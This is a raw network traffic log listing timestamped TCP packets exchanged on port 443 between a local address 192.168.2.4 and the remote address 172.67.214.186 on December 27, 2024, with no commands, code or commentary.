                                                                                                                                      Dec 27, 2024 10:22:02.301783085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.301819086 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.302522898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.302561998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.302577019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.302618980 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.307548046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.307571888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.307620049 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.307632923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.307662010 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.307677984 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.471033096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.471054077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.471148014 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.471182108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.471221924 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.476712942 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.476732016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.476818085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.476849079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.476897955 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.482413054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.482439041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.482513905 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.482543945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.482594967 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.487407923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.487421989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.487500906 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.487530947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.487576962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.492719889 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.492734909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.492819071 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.492829084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.492873907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.498423100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.498437881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.498524904 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.498545885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.498596907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.504080057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.504108906 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.504154921 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.504173040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.504199028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.504215002 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.509752035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.509774923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.509826899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.509843111 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.509879112 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.672461033 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.672487020 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.672580957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.672615051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.672661066 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.678163052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.678178072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.678256989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.678284883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.678328037 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.683176994 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.683193922 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.683263063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.683286905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.683327913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.688911915 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.688926935 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.689007998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.689035892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.689081907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.694261074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.694276094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.694335938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.694354057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.694396019 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.699909925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.699924946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.699979067 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.699995041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.700033903 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.705579042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.705594063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.705651045 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.705668926 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.705714941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.869643927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.869662046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.869728088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.869761944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.869808912 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.874237061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.874255896 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.874325037 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.874336004 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.874375105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.881742001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.881757975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.881829023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.881838083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.881889105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.885679007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.885695934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.885761023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.885770082 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.885808945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.890671015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.890686035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.890744925 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.890758038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.890796900 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.896707058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.896730900 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.896780968 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.896790981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.896816015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.896826982 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.901802063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.901818991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.901911020 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.901923895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.901967049 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.907426119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.907485008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.907497883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.907510996 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:02.907537937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:02.907556057 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.070983887 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.071011066 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.071077108 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.071120024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.071141005 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.071161985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.075525999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.075542927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.075634956 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.075668097 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.075723886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.081288099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.081302881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.081377983 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.081408978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.081449986 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.086910963 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.086925983 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.086998940 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.087025881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.087065935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.091895103 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.091916084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.091968060 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.091993093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.092010021 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.092030048 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.097940922 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.097969055 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.098043919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.098066092 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.098086119 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.098167896 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.103003979 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.103018045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.103091955 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.103120089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.103162050 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.108731031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.108745098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.108822107 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.108849049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.108887911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.272325039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.272342920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.272416115 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.272454023 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.272496939 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.277364969 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.277381897 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.277456999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.277467966 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.277507067 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.282768011 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.282788992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.282857895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.282870054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.282908916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.287787914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.287806034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.287873030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.287900925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.287949085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.293493986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.293512106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.293591022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.293616056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.293659925 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.298815012 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.298832893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.298902035 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.298913956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.298959970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.304542065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.304558992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.304629087 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.304640055 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.304686069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.310190916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.310211897 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.310302019 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.310312033 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.310326099 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.310348034 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.473867893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.473891020 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.473933935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.473973989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.473994017 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.474015951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.478437901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.478461981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.478513956 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.478543043 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.478584051 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.484116077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.484133005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.484177113 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.484211922 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.484234095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.484250069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.489743948 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.489763975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.489801884 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.489821911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.489836931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.489855051 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.495445013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.495469093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.495501041 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.495526075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.495546103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.495562077 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.500921011 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.500936031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.500988007 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.501010895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.501050949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.505753994 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.505769014 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.505816936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.505837917 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.505873919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.511547089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.511563063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.511625051 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.511645079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.511682034 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.675535917 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.675554037 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.675672054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.675713062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.675754070 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.680677891 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.680691957 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.680780888 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.680804014 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.680841923 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.685688972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.685705900 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.685801029 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.685832977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.685878038 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.691219091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.691234112 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.691333055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.691365957 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.691410065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.697000980 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.697020054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.697108984 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.697135925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.697184086 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.702272892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.702287912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.702367067 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.702394962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.702433109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.708003044 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.708015919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.708106995 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.708127975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.708165884 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.713021040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.713036060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.713138103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.713174105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.713227034 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.717859030 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.717936039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.717947960 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.717978954 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.717998028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.718014956 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.881108999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.881129026 CET44349745172.67.214.186192.168.2.4
